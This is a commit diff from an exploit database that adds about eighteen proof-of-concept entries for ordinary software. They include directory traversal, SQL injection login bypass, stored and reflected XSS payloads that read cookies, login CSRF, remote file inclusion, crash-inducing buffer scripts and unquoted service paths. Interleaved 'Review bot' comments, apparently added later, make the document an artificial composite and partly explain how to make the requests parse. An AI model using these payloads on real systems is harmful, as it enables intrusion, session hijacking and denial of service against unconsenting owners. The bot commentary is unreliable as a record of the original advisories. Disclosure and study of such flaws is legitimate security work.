DB: 2020-12-08

18 changes to exploits/shellcodes

TapinRadio 2.13.7 - Denial of Service (PoC)
RarmaRadio 2.72.5 - Denial of Service (PoC)

Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path

Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path
Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path
Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path
Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)

Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow

Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution
Joomla! 1.5 < 3.4.6 - Object Injection 'x-forwarded-for' Header Remote Code Execution

Eaton Intelligent Power Manager 1.6 - Directory Traversal

PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting

Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities

Employee Record Management System 1.1 - Login Bypass SQL Injection

User Registration & Login and User Management System 2.1 - Cross Site Request Forgery
Cyber Cafe Management System Project (CCMS) 1.0 - Persistent Cross-Site Scripting
Savsoft Quiz 5 - 'Skype ID' Stored XSS
vBulletin 5.6.3 - 'group' Cross Site Scripting
This commit is contained in:
Offensive Security 2020-12-08 05:01:56 +00:00
parent 045c2fe1ae
commit 9dd5a95a94
19 changed files with 825 additions and 4 deletions


@ -0,0 +1,28 @@
# Exploit Title: Eaton Intelligent Power Manager 1.6 - Directory Traversal
# Date: 2018-09-29
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://powerquality.eaton.com/
# Software Link: https://powerquality.eaton.com/Support/Software-Drivers/default.asp?cx=-999
# Version: v1.6
# Tested on: Windows
# CVE-2018-12031
# https://nvd.nist.gov/vuln/detail/CVE-2018-12031
# https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
# PoC
To exploit vulnerability, someone could use
'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../'
request to get some informations from the target.
GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host
HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0)
Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
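Review bot: the request line and the User-Agent header are wrapped, so `HTTP/1.1` and `Gecko/20100101 Firefox/60.0` sit on their own lines; as pasted this is not a valid HTTP request, and each should be rejoined onto the line above it. On the substance, the `firmware` parameter of `node_upgrade_srv.js?action=downloadFirmware` is handed to a file download with `/../../../../` sequences accepted, which is the traversal CVE-2018-12031 records; the server-side fix is to canonicalise the requested path and refuse anything that resolves outside the firmware directory, and a defender can alert on requests to `node_upgrade_srv.js` whose `firmware` value contains `..`. The `# Date: 2018-09-29` header also predates the 2020-12-08 database entry by two years; worth a note that this is the original disclosure date.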


@ -0,0 +1,20 @@
# Exploit Title: Employee Record Management System 1.1 - Login Bypass SQL Injection
# Date: 20201117
# Exploit Author: Anurag Kumar Rawat(A1C3VENOM)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/
# Version: 1.1
# Tested on Parrot os(Linux)
Attack Vector:
An attacker can gain admin panel access using malicious sql injection quiries.
Steps to reproduce:
1. Open admin login page using following URl:
-> http://localhost/erms/admin/index.php
2. Now put below Payload in both the fields( User ID & Password)
Payload: ' or '1'='1
3)Server accept this payload and attacker successfully bypassed admin panel
without any credentials
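Review bot: the entry states no fix. The payload `' or '1'='1` being accepted in both User ID and Password shows the admin login query is built by string concatenation, so the mitigation line to add is prepared statements with bound parameters for that query, with the password compared against a stored hash in application code rather than inside the SQL WHERE clause. Formatting: `# Date: 20201117` should be ISO `2020-11-17` like the other entries, `# Tested on Parrot os(Linux)` is missing its colon, and the steps mix `1.`/`2.` with `3)`.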


@ -1,17 +1,17 @@
#!/usr/bin/env python
# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header
# Exploit Title: Joomla 1.5 - 3.4.6 Object Injection RCE X-Forwarded-For header
# Date: 12/17/2015
# Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs)
# Vendor Homepage: https://www.joomla.org/
# Software Link: http://joomlacode.org/gf/project/joomla/frs/
# Version: Joomla 1.5 - 3.4.5
# Version: Joomla 1.5 - 3.4.6
# Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable)
# CVE : CVE-2015-8562
'''
Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562
Joomla 1.5 - 3.4.6 Object Injection RCE - CVE-2015-8562
PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE
Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com):
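Review bot: the three changed lines (the `# Exploit Title:`, the `# Version:` header and the docstring title) now read `Joomla 1.5 - 3.4.6`, an inclusive range that implies 3.4.6 is affected, whereas the commit message lists this entry as `Joomla! 1.5 < 3.4.6`, i.e. with 3.4.6 as the upper bound. Write `1.5 < 3.4.6` in the file as well so the header agrees with the index and does not mark the bounding release as vulnerable. Nothing below the docstring changes, so the script body is the original PoC.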


@ -0,0 +1,54 @@
# Exploit Title: PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting
# Date: 2020-08-20
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://pandorafms.org/
# Software Link: https://pandorafms.org/features/free-download-monitoring-software/
# Version: 7.0NG747
# Tested on: Windows/Linux/ISO
# Link https://github.com/EmreOvunc/Pandora-FMS-7.0-NG-747-Stored-XSS
# Description
A stored cross-site scripting (XSS) in Pandora FMS 7.0 NG 747 can result in
an attacker performing malicious actions to users who open a maliciously
crafted link or third-party web page. (Workspace >> Issues >> List of
issues >> Add - Attachment)
# PoC
To exploit vulnerability, someone could use a POST request to
'/pandora_console/index.php' by manipulating 'filename' parameter in the
request body to impact users who open a maliciously crafted link or
third-party web page.
POST /pandora_console/index.php?sec=workspace&sec2=operation/incidents/incident_detail&id=3&upload_file=1
HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0)
Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------188134206132629608391758747427
Content-Length: 524
DNT: 1
Connection: close
Cookie: PHPSESSID=3098fl65su4l237navvq6d5igs
Upgrade-Insecure-Requests: 1
-----------------------------188134206132629608391758747427
Content-Disposition: form-data; name="userfile"; filename="\"><svg
onload=alert(document.cookie)>.png"
Content-Type: image/png
"><svg onload=alert(1)>
-----------------------------188134206132629608391758747427
Content-Disposition: form-data; name="file_description"
desc
-----------------------------188134206132629608391758747427
Content-Disposition: form-data; name="upload"
Upload
-----------------------------188134206132629608391758747427--
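Review bot: the injection point is the `filename=` attribute of the `userfile` multipart part, which the application stores with the incident and later renders without HTML-encoding; the fix the write-up should name is escaping the stored filename on output (htmlspecialchars with ENT_QUOTES) and restricting accepted filenames to a safe character set on upload. Formatting: the request line is wrapped with `HTTP/1.1` on a separate line, `Content-Type: multipart/form-data;` is split from its `boundary=` value, and the `filename="\"><svg` attribute is broken across two lines; all three must be single lines for the request to parse, and `Content-Length: 524` should be rechecked once they are rejoined.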


@ -0,0 +1,316 @@
# Exploit Title: Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
# Exploit Author: Vulnerability-Lab
# Date: 2020-11-11
# Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended
# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended
# Version: 3.5.3
Document Title:
===============
SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2265
Release Date:
=============
2020-11-11
Vulnerability Laboratory ID (VL-ID):
====================================
2265
Common Vulnerability Scoring System:
====================================
7.8
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
2.000€ - 3.000€
Product & Service Introduction:
===============================
It offers numerous opportunities to present pictures quickly and easily
in articles. The unique feature of the plugin is
that you can control any parameter on the syntax call. Editor Button -
SIGE Parameters: With the button, you can set the
parameters very easy on-the-fly in an article. It is an excellent
addition to SIGE. Highlights are: parameter call, watermark
function, read IPTC data, thumbnail storage, crop function, sort by
modification date, output as a list, CSS Image Tooltip,
Editor Button SIGE Parameter and much more. In version 1.7-2, SIGE was
rewritten entirely and equipped with numerous innovations.
The absolute highlight is the turbo mode. This feature doesn't exist in
any other plugin for Joomla!. In Turbo Mode 2 text files
are created from the HTML output of the gallery and loaded in successive
runs. This feature eliminates the tedious editing
process of each image. In a test with 50 large images, the creation of a
gallery with all the extra features (save thumbnails,
watermark generation, resize original images, etc.) without turbo mode
lasted approximately 17 seconds. In turbo mode, it only
took 1 second, and the gallery on the same scale was available! For
calling the syntaxes, additionally, an Editor Button has
been programmed. It makes it very easy to choose the required syntax,
showing all the settings and parameters of the plugin.
It is a great enrichment in using the SIGE plugin.
(Copy of the Homepage:
https://kubik-rubik.de/sige-simple-image-gallery-extended )
(Software: https://kubik-rubik.de/sige-simple-image-gallery-extended ;
https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended ;
https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple
web vulnerabilities in the Simple Image Gallery Extended (SIGE) v3.4.1 &
v3.5.3 pro extension for joomla.
Affected Product(s):
====================
Vendor:
Product: Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 Pro -
Joomla Extension (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-11-10: Researcher Notification & Coordination (Security Researcher)
2020-11-11: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Open Authentication (Anonymous Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Full Disclosure
Technical Details & Description:
================================
1.1
A file include vulnerability has been discovered in the official Simple
Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla.
The web vulnerability allows remote attackers to unauthorized upload
web-shells or malicious contents to compromise the local file-system.
The vulnerability is located in the img parameter of the print.php file.
Remote attackers are able to upload images to the unrestricted assets
path to compromise the web-applications file-system and involved
database management system. Exploitation requires no user interaction
and only
a low privileged user account to upload images.
1.2
Multiple non-persistent cross site web vulnerabilities has been
discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 &
v3.5.3 pro extension for joomla.
The vulnerability allows remote attackers to inject own malicious script
codes with non-persistent attack vector to compromise browser to
web-application requests from the client-side.
The non-persistent cross site scripting web vulnerabilities are located
in the `name` and `title` parameters of the `print.php` file.
Remote attackers without user or guest privileges are able to make own
malicious special crafted links to compromise client-side
GET method requests. The attack vector is non-persistent and the issue
affects the client-side.
Successful exploitation of the vulnerabilities results in session
hijacking, non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent client-side
manipulation of affected application modules.
Proof of Concept (PoC):
=======================
1.1
The remote file include web vulnerability can be exploited by remote
attackers without privileged user account or user interaction.
For security demonstration or to reproduce the persistent cross site web
vulnerability follow the provided information and steps below to continue.
Dork(s):
intext:"Powered by Simple Image Gallery Extended"
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
PoC: Exploitation
http://[SERVER/DOMAIN]/[folders]/print.php?img=[RFI
VULNERABILITY!]&name=[NAME]%20title=[TITLE]
1.2
The non-persistent cross site scripting web vulnerability can be
exploited by remote attackers without privileged user account and with
low user interaction.
For security demonstration or to reproduce the persistent cross site web
vulnerability follow the provided information and steps below to continue.
Dork(s):
intext:"Powered by Simple Image Gallery Extended"
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
PoC: Payload
"><svg onload=alert()>
'><script>alert('');</script>
<IMG "'"><script>alert()</script>'>
PoC: Example
http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NON-PERSISTENT XSS]%20title=[TITLE]
http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NAME]%20title=[NON-PERSISTENT
XSS]
PoC: Exploitation
http://[SERVER/DOMAIN]/oldsite/plugins/content/sige/plugin_sige/print.php
?img=http://[SERVER/DOMAIN]/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E
Solution - Fix & Patch:
=======================
1.1
The remote file include vulnerability issue can be resolved by the
following steps ...
Example :
?php
$files=array('test.gif');
if(in_array($_GET['file'], $files)){
include ($_GET['file']);
}
?
* If you are a server administrator, turn off allow_url_fopen from the file
* Or do it with the ini_set command. Only for (RFI)
?php
ini_set('allow_url_fopen ', 'Off');
?
* We can use the strpos command to check that if the address is: //
http, the file will not be enclosed
?php
$strpos = strpos($_GET['url'],'http://');
if(!$strpos){
include($_GET['url']);
}
?
* Using str_replace we can give the given address from two characters
"/", "." Let's clean up
?php
$url=$_GET['url'];
$url = str_replace("/", "", $url);
$url = str_replace(".", "", $url);
include($url);
?
1.2
The client-side cross site scripting vulnerabilities can be resolved by
the following steps ...
1. Encode and escape as parse the name and title parameters
2. Filter the input for special chars and disallow them in parameters
Security Risk:
==============
1.1
The securit risk of the remote file include vulnerability in the img
path of the web-application request is estimated as high.
1.2
The security risk of the non-persistent cross site scripting
vulnerabilities is estimated as medium.
Credits & Authors:
==================
h4shursec - https://www.vulnerability-lab.com/show.php?user=h4shursec
Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @netedit0r
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
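Review bot: the PHP samples under `Solution - Fix & Patch 1.1` contain defects that would leave the include open. `if(!$strpos)` treats an `http://` prefix at offset 0 as "not found", because strpos returns 0 there and `!0` is true, so exactly the input the check is meant to block gets included; the comparison must be `=== false`, and the check ignores other schemes such as `https://` in any case. `ini_set('allow_url_fopen ', 'Off')` has a trailing space in the directive name, and `allow_url_fopen` is PHP_INI_SYSTEM, so it cannot be changed from script code at all; it belongs in php.ini. The `str_replace` variant strips every `/` and `.`, which breaks legitimate filenames without stopping remote URLs. The only sound sample is the first one, an allowlist checked with `in_array` against a fixed list of files, and the advisory should recommend that alone. Also the `<?php` / `?>` tags survive only as bare `?php` / `?`, and the PoC 1.1 paragraph says "persistent cross site web vulnerability" where it means the file include.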


@ -0,0 +1,32 @@
# Exploit Title: User Registration & Login and User Management System 2.1 - Cross Site Request Forgery
# Exploit Author: Dipak Panchal(th3.d1p4k)
# Vendor Homepage: https://phpgurukul.com
# Software Link: http://user-registration-login-and-user-management-system-with-admin-panel
# Version: 5
# Tested on Windows 10
Attack Vector:
An attacker can craft HTML page containing POST information to have the
victim sign into an attacker's account, where the victim can add
information assuming he/she is logged into the correct account, where in
reality, the victim is signed into the attacker's account where the changes
are visible to the attacker.
Exploit:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/loginsystem/" method="POST">
<input type="hidden" name="uemail" value="user1@mail.com" />
<input type="hidden" name="password" value="User@1234" />
<input type="hidden" name="login" value="LOG&#32;IN" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Mitigation:
Please add a csrf token to login request or make some type prompt that the
session has ended when the new login from attacker occurs.
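Review bot: `# Version: 5` contradicts the title, which gives 2.1, and `# Software Link:` is not a usable URL (a bare slug with no host), both copied from the Savsoft Quiz entry by the same author. The mitigation line is right as far as it goes; since this is a login CSRF, the usual fix is a token bound to the pre-login session on the login form together with `SameSite` on the session cookie, and a visible "you have been signed in as <account>" notice so a victim would notice the account switch the Attack Vector paragraph describes.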


@ -0,0 +1,17 @@
# Exploit Title: Cyber Cafe Management System Project (CCMS) 1.0 - Persistent Cross-Site Scripting
# Date: 04-12-2020
# Exploit Author: Pruthvi Nekkanti
# Vendor Homepage: https://phpgurukul.com
# Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
# Version: 1.0
# Tested on: Kali Linux
Attack vector:
This vulnerability can results attacker to inject the XSS payload in admin username and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
Vulnerable Parameters: Admin Username.
Steps-To-Reproduce:
1. Go to the Product admin panel change the admin username
2. Put this payload in admin username field:"><script>alert(document.cookie)</script>
3. Now go to the website and the XSS will be triggered.
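Review bot: `# Date: 04-12-2020` is ambiguous between day-month and month-day and should be ISO `2020-12-04` like the other entries, and `# Product link:` should be `# Software Link:` to match the template. The write-up lacks a fix: the admin username is stored once and then printed into every page unescaped, so the mitigation is HTML-encoding the username wherever it is rendered, with validation of the username field as a second layer.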


@ -0,0 +1,23 @@
# Exploit Title: Savsoft Quiz 5 - 'Skype ID' Stored XSS
# Exploit Author: Dipak Panchal(th3.d1p4k)
# Vendor Homepage: https://savsoftquiz.com
# Software Link: https://github.com/savsofts/savsoftquiz_v5
# Version: 5
# Tested on Windows 10
Attack Vector:
This vulnerability can results attacker to inject the XSS payload in User
Registration section and each time admin visits the manage user section
from admin panel, and home page too. XSS triggers and attacker can able to
steal the cookie according to the crafted payload.
Steps to reproduce:
1. Create new account and verified it.
2. Navigate to Edit Profile:
-> http://localhost/savsoftquiz/index.php/user/edit_user/123
3. Put the below Payload in Skype ID field. and submit it.
Payload: abcd<script>alert("XSS")</script>
4. You will get XSS popup.
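Review bot: the entry has no `# Date:` header, `# Tested on Windows 10` lacks its colon, and the `123` in the `edit_user/123` URL is the reporting account's id and should be shown as a placeholder. No fix is stated: the Skype ID value is rendered in the admin's manage-user view and on the home page without encoding, so the mitigation is HTML-escaping that field on output; stating that the payload reaches the admin panel is what justifies treating a self-registered user's input as high impact.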


@ -0,0 +1,28 @@
# Exploit Title: vBulletin 5.6.3 - 'group' Cross Site Scripting
# Date: 05.09.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.vbulletin.com/en/features/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox & Opera
# Google Dorks: "Powered by vBulletin® Version 5.6.3"
Go to the "Admin CP" - click on "Styles" - click "Style Manager" -
Choose "Denim" or other theme and choose action "Add new template" and
click "Go".
Put on the title "1" and template "1" and "Save and Reload". Now you
can catch the new URL with HTTP Live Headers or with hands.
So..we have Url :
https://localhost/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0
Test it with hands and get cross site scripting. Use for tests
different browsers. I use Mozilla Firefox and Opera.
https://localhost/admincp/template.php?templateid=1&group=""><script>alert("Cross
Site Scripting")</script><script>alert(document.cookie)</script>&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=
Picture:
https://imgur.com/a/b6gH5Fn
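Review bot: the affected page is `/admincp/template.php`, so the XSS only reaches a user already authenticated to the Admin CP; the header should say the issue requires administrator privileges, which bounds its impact. The PoC URL is wrapped across two lines and its `windowScrollTop=` tail is cut, and the only evidence is an external imgur link, so a sentence stating that the `group` parameter is reflected unescaped into the template editor belongs in the text itself. `# Date: 05.09.2020` should be ISO, and there is no `# Vendor Homepage:` or `# Version:` header.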


@ -0,0 +1,30 @@
# Exploit Title: TapinRadio 2.13.7 - Denial of Service (PoC)
# Date: 2020-05-12
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: www.raimersoft.com/downloads/tapinradio_setup_x64.exe
# Version: 2.13.7 x64
# Tested on: Windows 10 Home x64
#STEPS
# Open the program TapinRadio
# In Settings select Preferences option
# Click in Miscellaneous and click in Set Application Proxy
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Mikon.txt"
# Paste the content in the field Username and Address and click in OK
# Click in Ok again
# After TapinRadio closed, the program did not work again if the user try to open again, so it is necessary uninstall and install again
# End :)
buffer = 'K' * 20000
try:
file = open("Mikon.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")
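Review bot: the bare `except:` swallows every exception, including KeyboardInterrupt, and prints `Archive no ready` with no reason; use `except OSError as e` and a `with open("Mikon.txt", "w") as f:` block so the file is also closed on error. Both messages say `Archive` where `File` is meant. The step `After TapinRadio closed, the program did not work again ...` means the oversized proxy value persists in the application's settings and the crash repeats on every start, i.e. a persistent denial of service that needs a reinstall; that is the actual impact and should be stated in the header, not only in the steps.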


@ -0,0 +1,29 @@
# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC)
# Date: 2020-05-12
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: https://www.raimersoft.com/rarmaradio.html
# Version: 2.75.5
# Tested on: Windows 10 Home x64
# CVE : n/a
#STEPS
# Open the program TapinRadio
# In Edit select Settings option
# Click in Network
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Paimon.txt"
# Paste the content in the field Username, Address and Server and click in OK
# End :)
buffer = 'K' * 20000
try:
file = open("Paimon.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")
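Review bot: `# Version: 2.75.5` contradicts the title (`2.72.5`), and the first step says `Open the program TapinRadio`, copied from the sibling entry; this one is RarmaRadio. Same code points as that entry: the bare `except:` hides the cause of failure, and a `with` block should replace the manual open/write/close.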


@ -0,0 +1,32 @@
# Exploit Title: Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path
# Discovery by: Erika Figueroa
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.realtek.com/en/
# Tested Version: 1.0.0.55
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 8.1 x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """
Realtek Audio Service RtkAudioService C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe Auto
# Service info:
C:\>sc qc "RtkAudioService"
[[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: RtkAudioService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
GRUPO_ORDEN_CARGA : PlugPlay
ETIQUETA : 0
NOMBRE_MOSTRAR : Realtek Audio Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
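Review bot: the discovery command pipes through `findstr /i "CodeMeter"`, which keeps only lines containing "CodeMeter", so it cannot have produced the `Realtek Audio Service` line shown beneath it; that filter was carried over from another advisory and should be dropped. `[[SC] QueryServiceConfig CORRECTO` has a doubled bracket. The `sc qc` output is the real evidence: an unquoted `C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe` path, `AUTO_START`, running as `LocalSystem`. The fix is to quote the binary path (`sc config RtkAudioService binPath= "\"C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe\""`), and the exploit paragraph should state its precondition plainly: the local user needs write access to `C:\` or to `C:\Program Files\Realtek\Audio`, which is what decides whether the unquoted path is exploitable on a given host.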


@ -0,0 +1,41 @@
# Exploit Title: Realtek Andrea RT Filters 1.0.64.7 - 'AERTSr64.EXE' Unquoted Service Path
# Discovery by: manuel Alvarez
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.realtek.com/en/
# Tested Version: 1.0.64.7
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i
"Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i
/v """
Andrea RT Filters Service
AERTFilters C:\Program Files\IDT\WDM\AESTSr64.exe
Auto
# Service info:
C:\Users\ComoDVD>sc qc AESTFilters
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: AESTFilters
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\IDT\WDM\AESTSr64.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Andrea ST Filters Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.
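Review bot: the names do not agree: the title says `AERTSr64.EXE`, the wmic output says `AERTFilters`, while `sc qc` is run against `AESTFilters` and shows `AESTSr64.exe` under `C:\Program Files\IDT\WDM\` with display name `Andrea ST Filters Service`; the title and file name should follow the `sc qc` evidence. The wmic pipeline carries the same `findstr /i "CodeMeter"` filter as the Realtek Audio Service entry, which would exclude this line, and the command is wrapped across three lines. `# Discovery by: manuel Alvarez` needs a capital M. The fix is quoting the service's ImagePath.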


@ -0,0 +1,30 @@
# Exploit Title: Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path
# Date: 2020-9-3
# Exploit Author: Mohammed Alshehri
# Vendor Homepage: http://rumble.sf.net/
# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
# Version: Version 0.51.3135
# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
# Service info:
C:\Users\m507>sc qc "RumbleService"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RumbleService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Rumble\rumble_win32.exe --service
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Rumble Mail Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\m507>
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
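Review bot: unlike the other unquoted-path entries this one has no wmic discovery step, only `sc qc`; that is enough evidence (`BINARY_PATH_NAME : C:\Program Files\Rumble\rumble_win32.exe --service`, `AUTO_START`, `LocalSystem`), but the `--service` argument deserves a comment, since it shows the value is parsed as a command line, which is exactly where the unquoted space is ambiguous. The one-line `# Exploit:` paragraph should name the precondition (write access to `C:\`) and the fix (quote the path in the service's ImagePath). `# Date: 2020-9-3` should be zero-padded and `# Version: Version 0.51.3135` repeats the word.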


@ -0,0 +1,28 @@
# Exploit Title: Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 05-12-2020
# Vendor Homepage: https://www.kite.com/
# Software Links : https://www.kite.com/download/
# Tested Version: 1.2020.1119.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
KiteService KiteService C:\Program Files\Kite\KiteService.exe Auto
C:\>sc qc "KiteService"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: KiteService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : KiteService
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
